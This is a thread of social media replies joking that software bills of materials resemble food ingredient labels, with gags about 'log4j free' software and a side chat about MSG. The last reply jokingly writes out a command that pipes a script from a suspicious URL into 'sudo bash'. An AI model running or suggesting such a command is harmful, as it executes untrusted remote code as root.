sboms are all the rage now, and I’ve been thinking of them like the ingredients on packaged food. Similar to how some foods have ā€œno MSGā€ or ā€œsugar freeā€, I wonder how long it will be before we see software with ā€œNo Apache Strutsā€ or ā€œWritten with only memory-safe languagesā€ā€¦
@jerry You invented the OWASP ASVS!!
@jerry Or, my preferred, "0.1% ground beef, 99.9% other materials."
@locksmithprime ā€œIndustrial use lemon substituteā€
@jerry Ah, that is the one I use to clean my floors!
@jerry i reckon its far far in future. What can happen is insurance provider asking for sbom to give you your premium price. Which again is not going to be a good measure by a long shot. Sbom is at this point a ingredient list as you said. Usage of it is all up in the air as most are happy just making one as of now. Do check cyclonedx xbom set of boms.
@jerry Only fair trade harvested libraries
@jerry And like food, may still contain bugs.
@jerry you can find vestiges of this in EU calls already.

@jerry

"This software was made only with ethically-sourced, organic, fair-trade non-GMO ones and zeroes."

#software #EthicallySourced #FairTrade #GMO #organic #ones #zeroes #SBOM

@jerry I think #GNU-free" and "#PermissivelyLicensed" vs. "#FLOSS-only" and the already existing flood of #GPLv3 and #AGPLv3 stickers are coming sooner than later...
@jerry šŸ¤–šŸš« not tested on artificial intelligence
@jerry with less memory safety, and 50% more buffer overflows. Operators are standing by to take your order.

@jerry as the documentation of the perl MIME::Lite module notes …

NUTRITIONAL INFORMATION

For some reason, the US FDA says that this is now required by law on any products that bear the name "Lite"...

Version 3.0 is now new and improved! The distribution is now 30% smaller!

MIME::Lite |

------------------------------------------------------------

Serving size: | 1 module

Servings per container: | 1

Calories: | 0

Fat: | 0g

Saturated Fat: | 0g

Warning: for consumption by hardware only! May produce indigestion in humans if taken internally.

@jerry I await the official ā€œShips with log4j bits but you really can’t taste them and we don’t actually use them, we just don’t give a shit about our build pipelineā€ entry
@jerry @reverseics sure, but MSG is delicious
@hacks4pancakes @jerry @reverseics MSG is the victim of racism (yes, really). There's nothing wrong with it. I have a shaker of the stuff (not salt-encrusted, I have enough soy sauce already) and love it. That said, liquid aminos are pretty fantastic too.

@adamhotep @hacks4pancakes @jerry @reverseics at least, there aren't any issues with it that aren't also present with table salt.

It's a nice and easy flavor enhancer

@adamhotep @jerry @reverseics I’m not a great cook and it saves me a lot. I use it more than salt
@jerry well in marketing we might have that already, but in CS thereā€˜s not much regulation on that. One of the first is the upcoming CE mark and similar rules for cybersecurity of products
@jerry following the food labeling we'll see apache httpd 100% log4j free

@jerry I’m afraid we’ll get that thing where Tic Tacs have ā€œ0g of sugarā€, because the serving size (490mg) while mostly sugar (300mg) evades the minimum reporting thresholds (500mg) letting you round to 0.

But with ā€œ | sudo shā€

@ckure @jerry
Especially
curl http://suspicious.looking.url/git/spoon.sh | sudo bash